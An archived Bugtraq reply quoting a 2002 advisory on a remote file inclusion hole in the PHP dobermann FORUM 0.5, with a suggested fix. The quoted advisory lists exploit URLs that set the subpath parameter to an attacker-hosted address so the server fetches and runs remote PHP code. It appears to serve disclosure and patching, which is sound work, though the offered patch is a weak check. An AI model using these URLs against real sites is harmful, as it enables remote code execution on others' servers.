RE: dobermann FORUM (php)

From: Mark Stunnenberg (marksgat_private)
Date: Tue Oct 29 2002 - 01:00:22 PST

Next message: Justin Cervero: "Further problems with Arescom NetDSL-800 MSN Firmware version 5.4.x and up"

Previous message: EnGarde Secure Linux: "[ESA-20021029-028] syslog-ng: buffer overflow in macro handling code (UPDATED)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Or place a:

--------------------
<? $subpath = ''; ?>
--------------------
Right above the place where the actual $subpath is being set.

Mark

> -----Original Message-----
> From: Frog Man [mailto:leseulfrogat_private] 
> Sent: zondag 27 oktober 2002 P 23:53
> To: bugtraqat_private
> Subject: dobermann FORUM (php)
> 
> 
> Informations :
> АААААААААААААА
> Product : dobermann FORUM
> version : 0.5
> website : http://www.le-dobermann.com
> Problem : Include file
> 
> PHP Code/location :
> ААААААААААААААААААА
> entete.php
> enteteacceuil.php
> topic/entete.php :
> ------------------------------------------
> <?php @include $subpath."banniere.php"; ?>
> ------------------------------------------
> 
> index.php
> newtopic.php :
> ------------------------
> @require "config.php";
> @include("entete.php");
> ------------------------
> 
> Exploits :
> АААААААААА http://[target]/entete.php?subpath=http://[attacker]/
> http://[target]/enteteacceuil.php?subpath=http://[attacker]/
> http://[target]/topic/entete.php?subpath=http://[attacker]/
> http://[target]/index.php?subpath=http://[attacker]/
> http://[target]/newtopic.php?subpath=http://[attacker]/
> with
> http://[attacker]/banniere.php
> 
> Patch :
> ААААААА
> In files :
> ------------------
> entete.php
> enteteacceuil.php
> topic/entete.php
> ------------------
> replace the line :
> ------------------------------------------
> <?php @include $subpath."banniere.php"; ?>
> ------------------------------------------
> by :
> ------------------------------------------
> <?php
> $banfile=$subpath."banniere.php";
> if (file_exists($banfile)){
> @include $banfile; }
> ?>
> ------------------------------------------
> 
> 
> 
> More details in french : 
> http://www.frog-> man.org/tutos/dobermannFORUM.txt
> translated 
> by Google : 
> http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-
man.org%2Ftutos%2FdobermannFORUM.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-
1&prev=%2Flanguage_tools


frog-m@n






_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! 
http://www.msn.fr/msger/default.asp

Next message: Justin Cervero: "Further problems with Arescom NetDSL-800 MSN Firmware version 5.4.x and up"
Previous message: EnGarde Secure Linux: "[ESA-20021029-028] syslog-ng: buffer overflow in macro handling code (UPDATED)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Oct 29 2002 - 08:44:16 PST